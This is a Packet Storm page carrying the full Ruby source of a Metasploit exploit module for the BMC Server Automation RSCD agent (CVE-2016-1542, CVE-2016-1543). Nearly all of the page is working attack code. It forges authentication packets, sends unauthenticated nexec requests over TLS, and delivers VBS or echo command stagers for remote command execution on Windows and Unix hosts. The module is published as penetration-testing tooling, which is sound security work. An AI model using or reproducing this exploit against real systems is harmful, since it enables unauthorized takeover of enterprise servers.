exploit the possibilities

BMC Server Automation RSCD Agent NSH Remote Command Execution

BMC Server Automation RSCD Agent NSH Remote Command Execution
Posted Jan 31, 2018
Authored by Nicky Bloor, Olga Yanushkevich | Site metasploit.com

This Metasploit module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication. Note: Under Windows, non-powershell commands may need to be prefixed with 'cmd /c'.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2016-1542, CVE-2016-1543
MD5 | 21c820bdd8fcc8d4555e107c87aa2da7

BMC Server Automation RSCD Agent NSH Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell

def initialize(info = {})
super(update_info(info,
'Name' => 'BMC Server Automation RSCD Agent NSH Remote ' \
'Command Execution',
'Description' => %q(
This module exploits a weak access control check in the BMC Server
Automation RSCD agent that allows arbitrary operating system commands
to be executed without authentication.
Note: Under Windows, non-powershell commands may need to be prefixed
with 'cmd /c'.
),
'Author' =>
[
'Olga Yanushkevich, ERNW <@yaole0>', # Vulnerability discovery
'Nicky Bloor (@NickstaDB) <nick@nickbloor.co.uk>' # RCE payload and Metasploit module
],
'References' =>
[
['URL', 'https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/'],
['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
['CVE', '2016-1542'],
['CVE', '2016-1543']
],
'DisclosureDate' => 'Mar 16 2016',
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => %w[win linux unix],
'Targets' =>
[
['Automatic', {}],
[
'Windows/VBS Stager', {
'Platform' => 'win',
'Payload' => { 'Space' => 8100 }
}
],
[
'Unix/Linux', {
'Platform' => %w[linux unix],
'Payload' => { 'Space' => 32_700 }
}
],
[
'Generic Command', {
'Arch' => ARCH_CMD,
'Platform' => %w[linux unix win]
}
]
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'Payload' => {
'BadChars' => "\x00\x09\x0a"
},
'CmdStagerFlavor' => %w[vbs echo])
)

register_options(
[
Opt::RPORT(4750)
]
)

deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
end

def check
# Send agentinfo request and check result
vprint_status('Checking for BMC with agentinfo request.')
res = send_agentinfo_request

# Check for successful platform detection
if res[0] == 1
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
return CheckCode::Detected
end

# Get first four bytes of the packet which should hold the content length
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0

# Return unknown if the packet format appears correct (length field check)
if res[1] && res[1].length - 4 == res_len
vprint_warning('Target appears to be BMC, however an unexpected ' \
'agentinfo response was returned.')
vprint_warning('Response: ' + res[1])
return CheckCode::Unknown
end

# Invalid response, probably not a BMC RSCD target
vprint_error('The target does not appear to be a BMC RSCD agent.')
vprint_error('Response: ' + res[1]) if res[1]
CheckCode::Safe
end

def exploit
# Do auto target selection
target_name = target.name

if target_name == 'Automatic'
# Attempt to detect the target platform
vprint_status('Detecting remote platform for auto target selection.')
platform = send_agentinfo_request

# Fail if platform detection was unsuccessful
if platform[0].zero?
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
'detecting target platform.')
end

# Set target based on returned platform
target_name = if platform[1].downcase.include?('windows')
'Windows/VBS Stager'
else
'Unix/Linux'
end
end

# Exploit based on target
vprint_status('Generating and delivering payload.')
if target_name == 'Windows/VBS Stager'
if payload.raw.start_with?('powershell', 'cmd')
execute_command(payload.raw)
else
execute_cmdstager(flavor: :vbs, linemax: payload.space)
end
handler
elsif target_name == 'Unix/Linux'
execute_cmdstager(flavor: :echo, linemax: payload.space)
handler
elsif target_name == 'Generic Cmd'
send_nexec_request(payload.raw, true)
end
end

# Execute a command but don't print output
def execute_command(command, opts = {})
if opts[:flavor] == :vbs
if command.start_with?('powershell') == false
if command.start_with?('cmd') == false
send_nexec_request('cmd /c ' + command, false)
return
end
end
end
send_nexec_request(command, false)
end

# Connect to the RSCD agent and execute a command via nexec
def send_nexec_request(command, show_output)
# Connect and auth
vprint_status('Connecting to RSCD agent and sending fake auth.')
connect_to_rscd
send_fake_nexec_auth

# Generate and send the payload
vprint_status('Sending command to execute.')
sock.put(generate_cmd_pkt(command))

# Finish the nexec request
sock.put("\x00\x00\x00\x22\x30\x30\x30\x30\x30\x30\x31\x61\x30\x30\x30" \
"\x30\x30\x30\x31\x32\x77\x38\x30\x3b\x34\x31\x3b\x33\x39\x30" \
"\x35\x38\x3b\x32\x34\x38\x35\x31")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x65\x7f")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x69\x03")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x74\x31")
sock.put("\x00\x00\x00\x1c\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30" \
"\x30\x30\x30\x30\x63\x77\x38\x30\x3b\x34\x31\x3b\x38\x30\x3b" \
"\x34\x31")
sock.put("\x00\x00\x00\x11\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30" \
"\x30\x30\x30\x30\x31\x7a")

# Get the response from the RSCD agent and disconnect
vprint_status('Reading response from RSCD agent.')
res = read_cmd_output
if show_output == true
if res && res[0] == 1
print_good("Output\n" + res[1])
else
print_warning('Command execution failed, the command may not exist.')
vprint_warning("Output\n" + res[1])
end
end
disconnect
end

# Attempt to retrieve RSCD agent info and return the platform string
def send_agentinfo_request
# Connect and send fake auth
vprint_status('Connecting to RSCD agent and sending fake auth.')
connect_to_rscd
send_fake_agentinfo_auth

# Send agentinfo request, read the response, and disconnect
vprint_status('Requesting agent information.')
sock.put("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \
"\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \
"\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \
"\x31\x30\x30\x30\x30\x30\x30\x30\x30")
res = sock.get_once
disconnect

# Return the platform field from the response if it looks valid
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
return [1, res.split(';')[4]] if res &&
res.split(';').length > 6 &&
res.length == (res_len + 4)

# Invalid or unexpected response format, return the complete response
[0, res]
end

# Connect to the target and upgrade to an encrypted connection
def connect_to_rscd
connect
sock.put('TLS')
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
sock.sslctx.ciphers = 'ALL'
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
end

# Send fake agentinfo auth packet and ignore the response
def send_fake_agentinfo_auth
sock.put("\x00\x00\x00\x5e\x30\x30\x30\x30\x30\x30\x35\x36\x30\x30\x30" \
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x35\x3b\x38\x38" \
"\x30\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x35" \
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x39" \
"\x3b\x61\x67\x65\x6e\x74\x69\x6e\x66\x6f\x3b\x2d\x3b\x2d\x3b" \
"\x30\x3b\x2d\x3b\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) +
"\x3b\x55\x54\x46\x2d\x38")
sock.get_once
end

# Send fake nexec auth packet and ignore the response
def send_fake_nexec_auth
sock.put("\x00\x00\x00\x5a\x30\x30\x30\x30\x30\x30\x35\x32\x30\x30\x30" \
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x31\x3b\x64\x61" \
"\x34\x3b\x64\x61\x34\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x31" \
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x35" \
"\x3b\x6e\x65\x78\x65\x63\x3b\x2d\x3b\x2d\x3b\x30\x3b\x2d\x3b" \
"\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x55" \
"\x54\x46\x2d\x38")
sock.get_once
end

# Generate a payload packet
def generate_cmd_pkt(command)
# Encode back slashes
pkt = command.gsub('\\', "\xc1\xdc")

# Encode double quotes unless powershell is being used
pkt = pkt.gsub('"', "\xc2\x68") unless pkt.start_with?('powershell')

# Construct the body of the payload packet
pkt = pad_number(pkt.length + 32) + "\x30\x30\x30\x30\x30\x30\x31\x30" \
"\x62\x37\x3b\x30\x3b\x32\x3b\x63\x61\x65\x3b\x64\x61\x34\x3b\x30" +
pad_number(pkt.length) + pkt

# Prefix with the packet length and return
[pkt.length].pack('N') + pkt
end

# Convert the given number to a hex string padded to 8 chars
def pad_number(num)
format('%08x', num)
end

# Read the command output from the server
def read_cmd_output
all_output = ''
response_done = false

# Read the entire response from the RSCD service
while response_done == false
# Read a response chunk
chunk = sock.get_once
next unless chunk && chunk.length > 4
chunk_len = chunk[0..3].unpack('N')[0]
chunk = chunk[4..chunk.length]
chunk += sock.get_once while chunk.length < chunk_len

# Check for the "end of output" chunk
if chunk_len == 18 && chunk.start_with?("\x30\x30\x30\x30\x30\x30\x30" \
"\x61\x30\x30\x30\x30\x30\x30" \
"\x30\x32\x78")
# Response has completed
response_done = true
elsif all_output == ''
# Keep the first response chunk as-is
all_output += chunk

# If the command failed, we're done
response_done = true unless all_output[8..15].to_i(16) != 1
else
# Append everything but the length fields to the output buffer
all_output += chunk[17..chunk.length]
end
end

# Return output if response indicated success
return [1, all_output[26..all_output.length]] if
all_output &&
all_output.length > 26 &&
all_output[8..15].to_i(16) == 1

# Return nothing if there isn't enough data for error output
return [0, ''] unless all_output && all_output.length > 17

# Get the length of the error output and return the error
err_len = all_output[8..15].to_i(16) - 1
[0, all_output[17..17 + err_len]]
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close